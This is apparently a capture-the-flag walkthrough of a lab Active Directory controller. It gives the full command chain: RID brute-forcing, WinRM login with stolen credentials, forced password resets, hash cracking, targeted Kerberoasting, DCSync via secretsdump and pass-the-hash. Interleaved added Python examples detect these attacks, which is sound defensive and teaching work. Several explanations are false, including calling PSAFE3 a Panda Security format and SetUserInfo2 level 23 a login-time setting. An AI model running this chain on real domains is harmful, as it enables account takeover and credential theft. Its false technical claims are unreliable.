Important Note
Enumeration
NMAP
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-11-25 20:02:37Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
60342/tcp open msrpc Microsoft Windows RPC
64997/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
65008/tcp open msrpc Microsoft Windows RPC
65013/tcp open msrpc Microsoft Windows RPC
65016/tcp open msrpc Microsoft Windows RPC
65035/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: 6h59m58s
| smb2-time:
| date: 2024-11-25T20:03:26
|_ start_date: N/A
Share Enumeration
User Enumeration
nxc smb administrator.htb -u 'olivia' -p 'ichliebedich' --rid-brute
olivia
michael
benjamin
emily
ethan
alexander
emma
Foothold
To establish a foothold, use the credentials and spawn a shell on the system using Evil-WinRM.
evil-winrm -i administrator.htb -u olivia -p ichliebedich
This provides a list of existing users on the system, but the relationship between them and your access is still missing. For this, BloodHound is the best tool to use.
User Enumeration with BloodHound
bloodhound-python -d administrator.htb -ns 10.10.11.42 -u olivia -p ichliebedich -c all
When analyzing the data in BloodHound, it becomes clear that Olivia has GenericAll over the user Michael.
In Windows Active Directory, GenericAll is a permission granted to a user or group on an AD object (such as a user account, group, or organizational unit). It is a very broad and powerful permission, as it grants the holder almost all available rights on that object.
This means that through the user Olivia, one can change the password of the user Michael.
When examining the user Michael, it becomes apparent that he has the right to change the password of the user Benjamin.
Benjamin is in the “Share Moderators” group. Putting everything together: through the user Olivia you can change the password of the user Michael, through whom you can change the password of Benjamin, who is allowed to connect to the FTP server.
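The chain above is exactly what a defender should be hunting for before an attacker does. The following is an added example (not code from the writeup) that walks BloodHound-style control edges and reports every chain by which a low-privilege account ends up controlling other accounts, groups or the domain. The edge names are the ones BloodHound uses; the principals and edges are constructed to mirror the relationships described here, and a real run would load a BloodHound JSON export instead.

```python
# Added example: audit BloodHound-style control edges for takeover chains.
# Edge names (GenericAll, GenericWrite, ForceChangePassword, MemberOf, DCSync)
# are BloodHound's; the principals and edges below are constructed to mirror
# the writeup and are not real data.
from collections import deque

# Rights whose holder can take over the target object (reset its password,
# write an SPN, change its DACL, ...). Group membership is followed too,
# because a group's rights apply to all of its members.
TAKEOVER_RIGHTS = {"GenericAll", "GenericWrite", "ForceChangePassword",
                   "WriteDacl", "WriteOwner", "Owns", "AllExtendedRights"}
FOLLOW_RIGHTS = TAKEOVER_RIGHTS | {"MemberOf"}

# Targets whose compromise means domain compromise.
HIGH_VALUE = {"ADMINISTRATOR.HTB", "Domain Admins"}

# Constructed edge list: (source, right, target).
EDGES = [
    ("olivia", "GenericAll", "michael"),
    ("michael", "ForceChangePassword", "benjamin"),
    ("benjamin", "MemberOf", "Share Moderators"),
    ("emily", "GenericWrite", "ethan"),
    ("ethan", "DCSync", "ADMINISTRATOR.HTB"),
    ("alexander", "MemberOf", "Domain Users"),
]


def build_graph(edges):
    """Adjacency list: source -> [(right, target), ...]."""
    graph = {}
    for src, right, dst in edges:
        graph.setdefault(src, []).append((right, dst))
    return graph


def control_paths(edges, start, max_hops=6):
    """Breadth-first walk from `start`; returns every path as a list of
    (right, node) pairs, the first pair being (None, start)."""
    graph = build_graph(edges)
    found = []
    queue = deque([[(None, start)]])
    while queue:
        path = queue.popleft()
        if len(path) - 1 >= max_hops:
            continue
        node = path[-1][1]
        visited = {n for _, n in path}
        for right, dst in graph.get(node, []):
            if dst in visited:          # do not loop through cycles
                continue
            new_path = path + [(right, dst)]
            found.append(new_path)
            if right in FOLLOW_RIGHTS:  # we now act as dst, keep walking
                queue.append(new_path)
    return found


def format_path(path):
    """Render a path as 'a -[Right]-> b -[Right]-> c'."""
    text = path[0][1]
    for right, node in path[1:]:
        text += f" -[{right}]-> {node}"
    return text


def risky_principals(edges, high_value=HIGH_VALUE):
    """Map each principal that can reach a high-value target to the shortest
    chain that gets it there (BFS order makes the first hit the shortest)."""
    hits = {}
    for start in sorted({src for src, _, _ in edges}):
        for path in control_paths(edges, start):
            if path[-1][1] in high_value:
                hits[start] = format_path(path)
                break
    return hits


if __name__ == "__main__":
    for path in control_paths(EDGES, "olivia"):
        print(format_path(path))
    print("principals with a path to a high-value target:")
    for who, chain in risky_principals(EDGES).items():
        print(f"  {who}: {chain}")
```

On the constructed data the walk reproduces the writeup's chain from olivia to the Share Moderators group and flags emily and ethan as having a path to the domain itself. The fix is to remove the offending ACEs (a plain user should never hold GenericAll or GenericWrite over another account) and to re-run the audit after every delegation change.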
net user michael password /domain
Then connect with rpcclient as Michael to change Benjamin’s password.
rpcclient -U michael
SetUserInfo2 is a function from the Windows API used to modify specific attributes of a user account within a Windows domain. It is primarily used in network applications and system administration scripts to update user information in Active Directory or local user accounts.
This function allows administrators or authorized users to change various properties of a user account, such as the user’s password, description, and other attributes related to the account. It works by interacting with the NetUserSetInfo function, which is responsible for modifying user account information at a higher level in the Windows operating system.
setuserinfo2 benjamin 23 'password'
Level 23 in the SetUserInfo2 API refers to modifying user profile attributes, particularly in relation to setting or changing login time restrictions and other security policies for a user account. This level allows administrators to configure login restrictions, such as limiting when a user can log in based on time-of-day settings, or adjusting other security settings related to the user’s account profile.
With this functionality, it becomes possible to adjust access permissions that could potentially enable further actions within the network or system.
Now, it is possible to connect to the FTP server, and on this server, there is an interesting file:
PSAFE3 is a file format used by Panda Security software. It is an encrypted file typically utilized by the Panda Passwords application to securely store passwords, usernames, and other sensitive data.
When working with this file on an FTP server, it’s important to ensure that the FTP command is run with sudo privileges, as without the necessary permissions, you might not be able to download the file.
The password for the file can be easily cracked with Hashcat.
hashcat -m 5200 Backup.psafe3 /usr/share/wordlists/rockyou.txt
The file contains user credentials for the users:
- emma
- alexander
- emily
Now, reconnect to the system using Evil-WinRM — the user flag is located on Emily’s desktop.
After spending some time on the system, I collected more data from Active Directory using BloodHound and the user Emily’s information. With this data, I was able to find something useful.
Emily has the GenericWrite permission over the user Ethan.
GenericWrite is a permission level in Active Directory (AD) that allows a user or group to modify almost all attributes of an object, without having full administrative control over that object. It is a fairly broad permission, but it does not carry the full privileges of an administrator.
This means that Emily can make significant changes to Ethan’s account or attributes, such as modifying properties like the password, group memberships, or other user details, but she cannot fully control the object or its settings as an administrator would.
As can be seen in this useful graphic, this permission can be exploited using Kerberoasting. However, this is only possible if the user has a Service Principal Name (SPN). In this case, Ethan does not have an SPN, so one must be created.
Kerberoasting
It took some time with Google, but I eventually came across the following GitHub repository:
GitHub – ShutdownRepo/targetedKerberoast: Kerberoast with ACL abuse capabilities
This creates an SPN entry.
Unfortunately, I encountered the following error, which seems to be triggered by the time difference between the client and Active Directory.
[!] Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
I checked the system time on the Active Directory server, which was actually 2 hours behind both my local time and the time on my VM.
Workaround:
- Switch to the root user.
- Disable automatic time updates via NTP:
timedatectl set-ntp off
- Synchronize the date and time with the target machine:
rdate -n [Target IP]
Once the time issue is fixed, you will receive the hash, which can then be cracked using Hashcat.
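From the domain controller's side, the GenericWrite-to-SPN-to-Kerberoast sequence described above leaves a distinctive trail. The following is an added example (not part of the writeup) that correlates Event ID 5136 (a servicePrincipalName value added to a user object; requires "Audit Directory Service Changes" and a SACL on the users container) with a following Event ID 4769 (TGS request) for that same account using RC4-HMAC (TicketEncryptionType 0x17). Field names follow the Windows event schema; all values are constructed for the demo, and mapping an ObjectDN to an account by its CN is a simplifying assumption.

```python
# Added example: detect targeted Kerberoasting from Windows Security events.
# Event values below are constructed; field names follow the Windows schema.
from datetime import datetime, timedelta
import re

RC4_HMAC = "0x17"                      # TicketEncryptionType for RC4-HMAC
CORRELATION_WINDOW = timedelta(hours=1)

SECURITY_EVENTS = [
    # 1. emily adds an SPN to ethan (the GenericWrite abuse)
    {"EventID": 5136, "TimeCreated": "2024-11-25T20:10:02",
     "SubjectUserName": "emily", "ObjectClass": "user",
     "ObjectDN": "CN=ethan,CN=Users,DC=administrator,DC=htb",
     "AttributeLDAPDisplayName": "servicePrincipalName",
     "OperationType": "Value Added",
     "AttributeValue": "HTTP/constructed-spn.administrator.htb"},
    # 2. emily requests an RC4 service ticket for ethan 39 seconds later
    {"EventID": 4769, "TimeCreated": "2024-11-25T20:10:41",
     "TargetUserName": "emily@ADMINISTRATOR.HTB", "ServiceName": "ethan",
     "TicketEncryptionType": "0x17", "IpAddress": "10.10.14.5"},
    # 3. benign: a workstation gets an AES ticket for the DC's service
    {"EventID": 4769, "TimeCreated": "2024-11-25T20:11:00",
     "TargetUserName": "WS01$@ADMINISTRATOR.HTB", "ServiceName": "DC$",
     "TicketEncryptionType": "0x12", "IpAddress": "10.10.11.50"},
    # 4. benign: an admin registers a real SPN days earlier, no RC4 TGS follows
    {"EventID": 5136, "TimeCreated": "2024-11-20T09:00:00",
     "SubjectUserName": "administrator", "ObjectClass": "user",
     "ObjectDN": "CN=svc_sql,CN=Users,DC=administrator,DC=htb",
     "AttributeLDAPDisplayName": "servicePrincipalName",
     "OperationType": "Value Added",
     "AttributeValue": "MSSQLSvc/sql01.administrator.htb:1433"},
]


def ts(value):
    return datetime.fromisoformat(value)


def account_from_dn(dn):
    """Assumption: the object's CN equals its sAMAccountName."""
    m = re.match(r"CN=([^,]+)", dn, re.IGNORECASE)
    return m.group(1).lower() if m else None


def spn_additions(events):
    """(time, writer, target account) for each SPN added to a user object."""
    out = []
    for e in events:
        if (e["EventID"] == 5136 and e["ObjectClass"] == "user"
                and e["AttributeLDAPDisplayName"] == "servicePrincipalName"
                and e["OperationType"] == "Value Added"):
            out.append((ts(e["TimeCreated"]), e["SubjectUserName"].lower(),
                        account_from_dn(e["ObjectDN"])))
    return out


def rc4_tgs_requests(events):
    """Every RC4 service-ticket request: the generic Kerberoast signal."""
    return [{"time": ts(e["TimeCreated"]),
             "requester": e["TargetUserName"].split("@")[0].lower(),
             "service": e["ServiceName"].lower(), "ip": e["IpAddress"]}
            for e in events
            if e["EventID"] == 4769 and e["TicketEncryptionType"] == RC4_HMAC]


def detect_targeted_kerberoast(events, window=CORRELATION_WINDOW):
    """An RC4 TGS for an account that just had an SPN written raises an alert."""
    alerts = []
    additions = spn_additions(events)
    for req in rc4_tgs_requests(events):
        for added_at, writer, target in additions:
            if target == req["service"] and added_at <= req["time"] <= added_at + window:
                alerts.append({"target": target, "spn_writer": writer,
                               "requester": req["requester"], "ip": req["ip"],
                               "same_principal": writer == req["requester"]})
    return alerts


if __name__ == "__main__":
    for alert in detect_targeted_kerberoast(SECURITY_EVENTS):
        print("targeted Kerberoast suspected:", alert)
```

The same principal writing the SPN and then requesting the ticket is the high-confidence case; a plain SPN write to a user object by anyone outside the admin tier is worth an alert on its own. Hardening that removes the payoff: AES-only Kerberos on user accounts and long, random passwords (or gMSAs) for anything that legitimately needs an SPN.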
Ethan’s permissions show that he has DCSync rights over the domain.
DCSync is a technique used to extract Active Directory (AD) data, particularly password hashes and Kerberos tickets, from domain controller servers.
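Replicating a domain partition exercises a fixed set of extended rights on the domain root, which is what makes DCSync detectable. The following is an added example (not part of the writeup) that flags Event ID 4662 ("An operation was performed on an object") records referencing the three replication right GUIDs when the subject is not a domain controller or other expected replicator. It requires "Audit Directory Service Access" and a SACL on the domain object. The GUIDs are the published Active Directory control-access right GUIDs; the event values and the replicator allowlist are constructed for the demo.

```python
# Added example: flag DCSync attempts in Windows Security Event ID 4662.
# All event values and the allowlist below are constructed; the three
# replication right GUIDs are the real Active Directory control-access rights.
import re

REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

# Computer accounts of the domain controllers (constructed) plus any
# legitimate sync accounts an organisation maintains as an allowlist.
EXPECTED_REPLICATORS = {"DC$", "DC02$"}

AUDIT_EVENTS = [
    # 1. ethan replicates the domain root: DCSync
    {"EventID": 4662, "TimeCreated": "2024-11-25T20:30:11",
     "SubjectUserName": "ethan", "SubjectDomainName": "ADMINISTRATOR",
     "ObjectName": "DC=administrator,DC=htb", "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n"
                   "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}\n"
                   "{89e95b76-444d-4c62-991a-0facbeda640c}"},
    # 2. benign: a second domain controller replicating normally
    {"EventID": 4662, "TimeCreated": "2024-11-25T20:31:00",
     "SubjectUserName": "DC02$", "SubjectDomainName": "ADMINISTRATOR",
     "ObjectName": "DC=administrator,DC=htb", "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n"
                   "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    # 3. benign: ethan reading a user object (unrelated property GUID)
    {"EventID": 4662, "TimeCreated": "2024-11-25T20:32:00",
     "SubjectUserName": "ethan", "SubjectDomainName": "ADMINISTRATOR",
     "ObjectName": "CN=emma,CN=Users,DC=administrator,DC=htb",
     "AccessMask": "0x10",
     "Properties": "{bf967aba-0de6-11d0-a285-00aa003049e2}"},
]

GUID_RE = re.compile(r"\{([0-9a-f-]{36})\}", re.IGNORECASE)


def replication_rights_used(event):
    """Names of the replication rights referenced in a 4662's Properties."""
    return [REPLICATION_RIGHTS[g.lower()]
            for g in GUID_RE.findall(event.get("Properties", ""))
            if g.lower() in REPLICATION_RIGHTS]


def detect_dcsync(events, expected=EXPECTED_REPLICATORS):
    """Alert on replication rights exercised by an unexpected principal."""
    alerts = []
    for e in events:
        if e["EventID"] != 4662:
            continue
        rights = replication_rights_used(e)
        if not rights or e["SubjectUserName"] in expected:
            continue
        alerts.append({"time": e["TimeCreated"],
                       "subject": f'{e["SubjectDomainName"]}\\{e["SubjectUserName"]}',
                       "object": e["ObjectName"], "rights": rights})
    return alerts


if __name__ == "__main__":
    for alert in detect_dcsync(AUDIT_EVENTS):
        print("DCSync suspected:", alert)
```

The preventive counterpart is to review who holds these three rights on the domain object: only domain controllers (and a documented sync account, if any) should, and a user account such as ethan appearing there is the misconfiguration that makes the attack possible.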
impacket-secretsdump can be used to dump the hashes.
impacket-secretsdump administrator.htb/ethan:[email protected]
This yields the Administrator password hash.
The hash can be used to log in via Evil-WinRM.
evil-winrm 10.10.11.42 -u administrator -H HASHHASHHASHHASHHASHHASH
The root flag can be found on the desktop.